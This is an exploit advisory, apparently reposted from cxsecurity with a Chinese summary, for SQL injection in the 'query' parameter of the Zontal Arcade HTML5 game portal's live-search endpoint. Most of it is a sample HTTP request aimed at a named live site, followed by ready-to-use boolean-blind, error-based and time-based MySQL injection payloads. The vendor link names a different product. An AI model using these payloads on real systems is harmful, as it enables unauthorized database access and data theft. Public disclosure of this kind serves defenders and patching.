Zontal Arcade HTML 5 Game Portal PHP Script - SQL Injection
Zontal Arcade HTML5游戏门户PHP脚本存在SQL注入漏洞,通过`query`参数可利用布尔盲注、错误注入和时间盲注等方法进行攻击。 2025-3-8 17:46:54 Author: cxsecurity.com(查看原文) 阅读量:1 收藏

Zontal Arcade HTML 5 Game Portal PHP Script - SQL Injection

# Exploit Title: Zontal Arcade HTML 5 Game Portal PHP Script - SQL Injection # Date: 05-03-2025 # Exploit Author: Buğra Enis Dönmez (n3c1) # Vendor: https://www.codester.com/items/12775/azon-dominator-affiliate-marketing-script # Demo Site: https://mvnstore.in/ # Tested on: Arch Linux # CVE: N/A ### Request ### POST /xhr/live-search.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Accept: / x-requested-with: XMLHttpRequest Referer: https://localhost Cookie: PHPSESSID=i1e2drrnljsdoi3v6k60cg9ehi Content-Length: 135 Accept-Encoding: gzip,deflate,br User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Host: mvnstore.in Connection: Keep-alive page=3&query=4 ### ### Parameter & Payloads ### Parameter: query (POST) Type: boolean-based blind Title: MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (MAKE_SET) Payload: page=3&query=4%' AND MAKE_SET(4114=4114,6966) AND 'ZtvW%'='ZtvW Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) Payload: page=3&query=4%' AND (SELECT 6392 FROM(SELECT COUNT(*),CONCAT(0x71766b7071,(SELECT (ELT(6392=6392,1))),0x7170707171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'NwQp%'='NwQp Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: page=3&query=4%' AND (SELECT 7502 FROM (SELECT(SLEEP(5)))Eovh) AND 'THGQ%'='THGQ ###



 

Thanks for you comment!
Your message is in quarantine 48 hours.

{{ x.nick }}

|

Date:

{{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1


{{ x.comment }}


文章来源: https://cxsecurity.com/issue/WLB-2025030009
如有侵权请联系:admin#unsafe.sh